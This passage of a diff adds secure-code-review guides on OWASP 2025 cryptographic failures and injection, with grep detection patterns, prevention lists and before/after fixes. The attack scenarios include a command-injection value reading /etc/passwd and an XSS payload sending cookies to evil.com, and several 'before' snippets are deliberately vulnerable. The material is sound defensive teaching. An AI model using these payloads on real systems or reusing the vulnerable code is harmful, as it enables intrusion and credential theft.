createHash\(['"]md5['"]\)|createHash\(['"]sha1['"]\)
|
|
40
|
+
hashlib\.md5|hashlib\.sha1
|
|
41
|
+
MessageDigest\.getInstance\(['"]MD5['"]\)|MessageDigest\.getInstance\(['"]SHA-1['"]\)
|
|
42
|
+
md5\(|sha1\(
|
|
43
|
+
|
|
44
|
+
# Weak randomness
|
|
45
|
+
Math\.random|random\.random|rand\(\)|Random\(\)
|
|
46
|
+
uuid.*v1|Date\.now
|
|
47
|
+
|
|
48
|
+
# Hardcoded secrets/keys
|
|
49
|
+
SECRET.*=\s*['"][^'"]{8,}|KEY.*=\s*['"][^'"]{8,}|PASSWORD.*=\s*['"][^'"]{4,}
|
|
50
|
+
private.?key|secret.?key|api.?key|access.?token
|
|
51
|
+
|
|
52
|
+
# Base64 as "encryption"
|
|
53
|
+
Buffer\.from.*base64|btoa\(|atob\(
|
|
54
|
+
base64\.encode|base64\.decode
|
|
55
|
+
|
|
56
|
+
# Cookie security flags
|
|
57
|
+
httpOnly\s*:\s*false|secure\s*:\s*false|sameSite.*none
|
|
58
|
+
Set-Cookie(?!.*Secure)(?!.*HttpOnly)
|
|
59
|
+
|
|
60
|
+
# Cleartext protocols
|
|
61
|
+
http:\/\/(?!localhost)|ftp:\/\/|smtp:\/\/
|
|
62
|
+
```
|
|
63
|
+
|
|
64
|
+
### JavaScript / TypeScript / Node.js
|
|
65
|
+
- `crypto.createHash('md5')` or `crypto.createHash('sha1')` for password hashing
|
|
66
|
+
- `Math.random()` used for tokens, session IDs, or reset codes
|
|
67
|
+
- `Buffer.from(data).toString('base64')` used as a "token" (trivially decodable)
|
|
68
|
+
- Session cookies set without `httpOnly: true`, `secure: true`, `sameSite: 'strict'`
|
|
69
|
+
- JWT secrets hardcoded in source files
|
|
70
|
+
- Missing `bcrypt`, `argon2`, or `scrypt` for password hashing
|
|
71
|
+
|
|
72
|
+
### Python
|
|
73
|
+
- `hashlib.md5()` or `hashlib.sha1()` for passwords
|
|
74
|
+
- `random.random()` or `random.randint()` for security tokens (should use `secrets` module)
|
|
75
|
+
- `base64.b64encode()` used as encryption
|
|
76
|
+
|
|
77
|
+
### Java
|
|
78
|
+
- `MessageDigest.getInstance("MD5")` or `MessageDigest.getInstance("SHA-1")`
|
|
79
|
+
- `java.util.Random` instead of `java.security.SecureRandom`
|
|
80
|
+
- Hardcoded keys in `KeySpec` constructors
|
|
81
|
+
|
|
82
|
+
## Prevention Measures
|
|
83
|
+
|
|
84
|
+
1. Classify data and identify what needs encryption per privacy laws and regulations
|
|
85
|
+
2. Don't store sensitive data unnecessarily — data not retained cannot be stolen
|
|
86
|
+
3. Encrypt all sensitive data at rest using strong algorithms (AES-256)
|
|
87
|
+
4. Use TLS 1.2+ for all data in transit; enforce with HSTS
|
|
88
|
+
5. Store passwords with strong adaptive hashing: Argon2, scrypt, bcrypt, or PBKDF2
|
|
89
|
+
6. Always use salts and appropriate work factors
|
|
90
|
+
7. Use CSPRNG for all security-sensitive random values
|
|
91
|
+
8. Never reuse IVs/nonces with the same key
|
|
92
|
+
9. Use authenticated encryption (GCM mode, not ECB/CBC)
|
|
93
|
+
10. Rotate cryptographic keys regularly
|
|
94
|
+
11. Disable caching for responses containing sensitive data
|
|
95
|
+
|
|
96
|
+
## Example Attack Scenarios
|
|
97
|
+
|
|
98
|
+
**Scenario 1 — Weak Password Hashing:**
|
|
99
|
+
Password database uses unsalted MD5. Attacker retrieves database via another vulnerability, cracks all passwords via rainbow tables in minutes.
|
|
100
|
+
|
|
101
|
+
**Scenario 2 — Predictable Tokens:**
|
|
102
|
+
Password reset tokens generated with `Math.random()`. Attacker predicts tokens and resets other users' passwords.
|
|
103
|
+
|
|
104
|
+
## Fix Examples
|
|
105
|
+
|
|
106
|
+
**Before (MD5 password hashing):**
|
|
107
|
+
```typescript
|
|
108
|
+
import crypto from 'crypto';
|
|
109
|
+
function hashPassword(password: string) {
|
|
110
|
+
return crypto.createHash('md5').update(password).digest('hex');
|
|
111
|
+
}
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
**After (bcrypt with salt):**
|
|
115
|
+
```typescript
|
|
116
|
+
import bcrypt from 'bcrypt';
|
|
117
|
+
async function hashPassword(password: string) {
|
|
118
|
+
return bcrypt.hash(password, 12);
|
|
119
|
+
}
|
|
120
|
+
async function verifyPassword(password: string, hash: string) {
|
|
121
|
+
return bcrypt.compare(password, hash);
|
|
122
|
+
}
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
**Before (predictable token):**
|
|
126
|
+
```typescript
|
|
127
|
+
const resetToken = Math.random().toString(36).substring(2);
|
|
128
|
+
```
|
|
129
|
+
|
|
130
|
+
**After (cryptographically secure token):**
|
|
131
|
+
```typescript
|
|
132
|
+
import crypto from 'crypto';
|
|
133
|
+
const resetToken = crypto.randomBytes(32).toString('hex');
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
## References
|
|
137
|
+
|
|
138
|
+
- [OWASP A04:2025](https://owasp.org/Top10/2025/A04_2025-Cryptographic_Failures/)
|
|
139
|
+
- OWASP Cheat Sheet: Password Storage
|
|
140
|
+
- OWASP Cheat Sheet: Cryptographic Storage
|
|
141
|
+
- OWASP Cheat Sheet: Transport Layer Protection
|
|
@@ -0,0 +1,155 @@
|
|
|
1
|
+
# A05:2025 — Injection
|
|
2
|
+
|
|
3
|
+
## Overview
|
|
4
|
+
|
|
5
|
+
Injection is #5 in OWASP Top 10:2025 (down from #3). 100% of applications were tested for injection, and the category holds the highest CVE count at 62,445 across 37 CWEs. Injection occurs when untrusted user input is sent to an interpreter and executed as commands — including SQL, NoSQL, OS command, ORM, LDAP, and Expression Language injection. Cross-Site Scripting (XSS) is included in this category.
|
|
6
|
+
|
|
7
|
+
## Key CWEs
|
|
8
|
+
|
|
9
|
+
- **CWE-79**: Cross-site Scripting (XSS) — 30,000+ CVEs
|
|
10
|
+
- **CWE-89**: SQL Injection — 14,000+ CVEs
|
|
11
|
+
- **CWE-78**: OS Command Injection
|
|
12
|
+
- **CWE-20**: Improper Input Validation
|
|
13
|
+
- **CWE-94**: Improper Control of Generation of Code (Code Injection)
|
|
14
|
+
- **CWE-77**: Command Injection
|
|
15
|
+
- **CWE-74**: Injection (general)
|
|
16
|
+
- **CWE-917**: Expression Language Injection
|
|
17
|
+
- **CWE-1336**: Template Injection
|
|
18
|
+
|
|
19
|
+
## What to Look For
|
|
20
|
+
|
|
21
|
+
### SQL Injection
|
|
22
|
+
- String concatenation in SQL queries (instead of parameterized queries)
|
|
23
|
+
- Template literals embedding user input directly into SQL
|
|
24
|
+
- ORM methods with raw query options using unsanitized input
|
|
25
|
+
- Dynamic table/column names from user input
|
|
26
|
+
|
|
27
|
+
### Command Injection
|
|
28
|
+
- `exec()`, `spawn()`, `system()`, `popen()` with user-controlled arguments
|
|
29
|
+
- Shell command strings built with user input concatenation
|
|
30
|
+
- `child_process` usage with unsanitized input
|
|
31
|
+
|
|
32
|
+
### Cross-Site Scripting (XSS)
|
|
33
|
+
- `dangerouslySetInnerHTML` in React without sanitization
|
|
34
|
+
- `innerHTML`, `outerHTML`, `document.write()` with user data
|
|
35
|
+
- Template rendering of unsanitized user input
|
|
36
|
+
- URL parameters reflected into HTML without encoding
|
|
37
|
+
|
|
38
|
+
### Code Injection
|
|
39
|
+
- `eval()` with user-controlled input
|
|
40
|
+
- `Function()` constructor with user input
|
|
41
|
+
- `setTimeout`/`setInterval` with string arguments from user input
|
|
42
|
+
- Dynamic `import()` with user-controlled paths
|
|
43
|
+
|
|
44
|
+
### Server-Side Request Forgery (SSRF)
|
|
45
|
+
- HTTP requests where the URL is user-controlled
|
|
46
|
+
- URL parsing/fetching endpoints without allowlist validation
|
|
47
|
+
- Image/preview/proxy endpoints fetching arbitrary URLs
|
|
48
|
+
|
|
49
|
+
### Grep Patterns
|
|
50
|
+
|
|
51
|
+
```
|
|
52
|
+
# SQL injection
|
|
53
|
+
\+.*['"].*SELECT|SELECT.*\+.*req\.|SELECT.*\$\{|SELECT.*%s
|
|
54
|
+
\.query\(.*\+|\.execute\(.*\+|\.raw\(.*\+
|
|
55
|
+
f"SELECT|f"INSERT|f"UPDATE|f"DELETE
|
|
56
|
+
|
|
57
|
+
# Command injection
|
|
58
|
+
exec\(|execSync\(|spawn\(|spawnSync\(
|
|
59
|
+
child_process|subprocess|os\.system|os\.popen
|
|
60
|
+
Runtime\.getRuntime\(\)\.exec
|
|
61
|
+
|
|
62
|
+
# XSS
|
|
63
|
+
dangerouslySetInnerHTML|innerHTML|outerHTML|document\.write
|
|
64
|
+
v-html|ng-bind-html|\{\{\{.*\}\}\}
|
|
65
|
+
|
|
66
|
+
# Code injection
|
|
67
|
+
eval\(|Function\(|new Function|setTimeout\(.*req|setInterval\(.*req
|
|
68
|
+
|
|
69
|
+
# SSRF
|
|
70
|
+
fetch\(.*req\.|axios\(.*req\.|http\.get\(.*req\.|urllib.*req\.
|
|
71
|
+
request\.get\(.*user|requests\.get\(.*param
|
|
72
|
+
```
|
|
73
|
+
|
|
74
|
+
### JavaScript / TypeScript / Node.js
|
|
75
|
+
- Template literals in SQL: `` `SELECT * FROM users WHERE id = ${req.params.id}` ``
|
|
76
|
+
- `exec(command)` where command includes user input
|
|
77
|
+
- `dangerouslySetInnerHTML={{ __html: userContent }}`
|
|
78
|
+
- `eval(req.body.code)` or similar
|
|
79
|
+
- `fetch(req.query.url)` in preview/proxy endpoints
|
|
80
|
+
|
|
81
|
+
### Python (Django/Flask)
|
|
82
|
+
- `cursor.execute(f"SELECT ... {user_input}")` — use parameterized queries
|
|
83
|
+
- `os.system(f"command {user_input}")` — use subprocess with shell=False
|
|
84
|
+
- `eval(request.data)` or `exec(request.data)`
|
|
85
|
+
- Jinja2 `|safe` filter on user input
|
|
86
|
+
|
|
87
|
+
### Java (Spring)
|
|
88
|
+
- `Statement.executeQuery()` with concatenated SQL (use `PreparedStatement`)
|
|
89
|
+
- `Runtime.getRuntime().exec()` with user input
|
|
90
|
+
- JSP `<%= request.getParameter() %>` without encoding
|
|
91
|
+
|
|
92
|
+
## Prevention Measures
|
|
93
|
+
|
|
94
|
+
1. Use parameterized queries / prepared statements for ALL database access
|
|
95
|
+
2. Use safe APIs that avoid the interpreter entirely
|
|
96
|
+
3. Implement positive server-side input validation (allowlists)
|
|
97
|
+
4. Escape special characters using interpreter-specific syntax
|
|
98
|
+
5. Use LIMIT and other SQL controls to prevent mass disclosure
|
|
99
|
+
6. For XSS: use framework auto-escaping, CSP headers, sanitize HTML (DOMPurify)
|
|
100
|
+
7. For command injection: avoid shell execution entirely; use library functions
|
|
101
|
+
8. For SSRF: validate and allowlist URLs; block internal network ranges
|
|
102
|
+
|
|
103
|
+
## Example Attack Scenarios
|
|
104
|
+
|
|
105
|
+
**Scenario 1 — SQL Injection:**
|
|
106
|
+
```
|
|
107
|
+
https://example.com/search?q=' OR '1'='1
|
|
108
|
+
```
|
|
109
|
+
Query becomes: `SELECT * FROM items WHERE name = '' OR '1'='1'` — returns all records.
|
|
110
|
+
|
|
111
|
+
**Scenario 2 — Command Injection:**
|
|
112
|
+
```
|
|
113
|
+
https://example.com/export?file=report;cat /etc/passwd
|
|
114
|
+
```
|
|
115
|
+
Server executes: `convert report;cat /etc/passwd` — leaks system files.
|
|
116
|
+
|
|
117
|
+
**Scenario 3 — XSS:**
|
|
118
|
+
User stores `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` as content, which executes in other users' browsers.
|
|
119
|
+
|
|
120
|
+
## Fix Examples
|
|
121
|
+
|
|
122
|
+
**Before (SQL injection):**
|
|
123
|
+
```typescript
|
|
124
|
+
const query = `SELECT * FROM notes WHERE title LIKE '%${searchTerm}%'`;
|
|
125
|
+
const results = db.all(query);
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
**After (parameterized query):**
|
|
129
|
+
```typescript
|
|
130
|
+
const results = db.all(
|
|
131
|
+
'SELECT * FROM notes WHERE title LIKE ?',
|
|
132
|
+
[`%${searchTerm}%`]
|
|
133
|
+
);
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
**Before (command injection):**
|
|
137
|
+
```typescript
|
|
138
|
+
const { exec } = require('child_process');
|
|
139
|
+
exec(`convert ${req.query.filename} output.pdf`);
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
**After (safe alternative):**
|
|
143
|
+
```typescript
|
|
144
|
+
const { execFile } = require('child_process');
|
|
145
|
+
const safeName = path.basename(req.query.filename);
|
|
146
|
+
execFile('convert', [safeName, 'output.pdf']);
|
|
147
|
+
```
|
|
148
|
+
|
|
149
|
+
## References
|
|
150
|
+
|
|
151
|
+
- [OWASP A05:2025](https://owasp.org/Top10/2025/A05_2025-Injection/)
|
|
152
|
+
- OWASP Cheat Sheet: Injection Prevention
|
|
153
|
+
- OWASP Cheat Sheet: SQL Injection Prevention
|
|
154
|
+
- OWASP Cheat Sheet: Query Parameterization
|
|
155
|
+
- OWASP Cheat Sheet: XSS Prevention
|